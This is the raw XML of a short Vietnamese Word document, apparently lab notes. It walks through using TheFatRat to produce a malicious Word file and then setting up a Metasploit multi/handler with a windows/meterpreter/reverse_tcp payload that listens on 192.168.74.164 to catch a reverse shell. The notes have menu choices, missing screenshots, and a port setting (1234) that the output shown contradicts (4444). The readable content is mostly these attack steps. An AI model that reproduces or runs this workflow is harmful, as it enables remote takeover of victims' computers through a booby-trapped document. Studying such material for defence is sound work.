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6709" w14:textId="6E4005E3" w:rsidR="006F3A35" w:rsidRDefault="008F4355">
      <w:r>
        <w:t>Dùng ThefatRat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292EBCCB" w14:textId="71D26323" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:t>Chạy lệnh: fatrat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F323ACA" w14:textId="5F2D06AF" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47593E5F" wp14:editId="1AE5063D">
            <wp:extent cx="5791702" cy="55402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4E13" w14:textId="6A47C962" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:t>Chọn 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F05ABD0" w14:textId="247B5CE7" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="488F1B5E" wp14:editId="7EE14E07">
            <wp:extent cx="5082980" cy="371126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D539" w14:textId="0543B0C0" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:t>Chọn 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0670E" w14:textId="1904AA6F" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FED83DB" wp14:editId="563A636A">
            <wp:extent cx="4961050" cy="346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E64" w14:textId="2A291D55" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E1F8DB" wp14:editId="78C7F5AE">
            <wp:extent cx="4412362" cy="390177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08F2" w14:textId="0B634113" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060E7243" wp14:editId="4E40149A">
            <wp:extent cx="5037257" cy="3924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234E" w14:textId="6CBD6040" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555B3DC7" wp14:editId="4E88AF64">
            <wp:extent cx="4869602" cy="2766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57AF" w14:textId="29D9C74A" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158AF3FE" wp14:editId="4F2DC48A">
            <wp:extent cx="594360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D9A" w14:textId="3C8271CB" w:rsidR="008F4355" w:rsidRDefault="008F4355">
      <w:r>
        <w:t>Sau đó copy file word ra và set msf để attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5732A3" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t xml:space="preserve">msf6 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E6849" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t>[*] Using configured payload generic/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833A6E4" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009641BD" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t>payload =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F649906" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf6 exploit(multi/handler) &gt; set lhost 192.168.74.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F38D8" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t>lhost =&gt; 192.168.74.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744AE9F" w14:textId="016A604F" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; set lport </w:t>
      </w:r>
      <w:r>
        <w:t>1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EBB418" w14:textId="77777777" w:rsidR="00245FCA" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t>lport =&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73543FB3" w14:textId="1D68EE9D" w:rsidR="008F4355" w:rsidRDefault="00245FCA" w:rsidP="00245FCA">
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008F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45"/>
    <w:rsid w:val="000F4C45"/>
    <w:rsid w:val="00245FCA"/>
    <w:rsid w:val="006F3A35"/>
    <w:rsid w:val="008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9962"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8EAB741D-54FF-408E-94FB-E99F9D55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customXml" Target="../customXml/item3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A3DB0F3B7DF4EA87E9071408B0D6E" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="0d59c8b9a4869882f0a17e4d27bde702">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="b702ecc2-b28e-4466-8985-05390c27eb6b" xmlns:ns3="00d187dc-8039-4c02-83bd-0959fd86527f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1433c508db4dca68b9a007fa2b17bacb" ns2:_="" ns3:_="">
    <xsd:import namespace="b702ecc2-b28e-4466-8985-05390c27eb6b"/>
    <xsd:import namespace="00d187dc-8039-4c02-83bd-0959fd865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2ecc2-b28e-4466-8985-05390c27eb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87dc-8039-4c02-83bd-0959fd8652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D2760-BC2D-46FB-8CA4-55BE65AF06E1}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5C9F4E5F-5DED-4E09-A878-86B8410AF687}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{60BF629B-F26A-42BB-9BE3-C2A2ED2127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Ngoc Hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Trinh Ngoc Hung</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-04T07:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-04T07:27:00Z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0x010100C83A3DB0F3B7DF4EA87E9071408B0D6E</vt:lpwstr>
  </property>
</Properties>
</file>